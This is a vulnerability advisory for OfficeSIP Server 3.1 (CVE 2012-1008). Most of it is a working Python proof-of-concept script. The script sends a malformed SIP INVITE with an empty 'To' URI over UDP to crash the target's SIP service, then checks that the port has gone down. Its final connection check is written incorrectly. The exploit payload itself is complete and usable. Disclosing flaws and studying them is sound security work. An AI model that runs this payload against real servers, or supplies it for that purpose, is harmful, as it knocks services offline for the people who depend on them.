OfficeSIP Server 3.1 suffers from denial of service vulnerability
Credit:
The information has been provided by Prabhu S Angadi .
Vulnerable Systems:
* OfficeSIP Server 3.1
Office SIP Server version 3.1 is prone to a denial of service vulnerability.
The vulnerability is caused due to improper validation of SIP/SIPS URI in the 'To' header of the request, which allows remote attackers to cause denial of
service condition.
Successful exploitation could allow an attacker to crash the service.
References:
http://www.officesip.com
http://secpod.org/blog/?p=461
http://www.officesip.com/download/OfficeSIP-Server-3.1.zip
Proof of Concept:
http://secpod.org/exploits/SecPod_Exploit_OfficeSIP_Server_DOS.py
import socket,sys,time
port = 5060
target = raw_input("Enter host/target ip address: ")
if not target:
print "Host/Target IP Address is not specified"
sys.exit(1)
print "you entered ", target
try:
socket.inet_aton(target)
except socket.error:
print "Invalid IP address found ..."
sys.exit(1)
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
print "socket() failed service not running"
sys.exit(1)
#Malicous To SIP URI triggers vulnerability and brings SIP port down
exploit = "INVITE sip:test@officesip.local SIP/2.0\r\n"+\
"Via: SIP/2.0/UDP example.com\r\n"+\
"To: user2 <sip:malicioususer@>\r\n"+\
"From: user1 <sip:user1@server1.com>;tag=00\r\n"+\
"Call-ID: test@server.com\r\n"+\
"CSeq: 1 INVITE\r\n"+\
"Contact: <sip:user1@server1.com>\r\n\r\n"
sock.sendto(exploit, (target, port))
#Server evaluates and takes a while to go down.
time.sleep(40)
sock.close()
#Verify port is down
try:
sock.connect()
except:
print "OfficeSIP server port is down."
print "Service not responding ...."
sys.exit(1)
CVE Information:
2012-1008
Disclosure Timeline:
Published: 2012-02-02
Please enable JavaScript to view the comments powered by Disqus.
blog comments powered by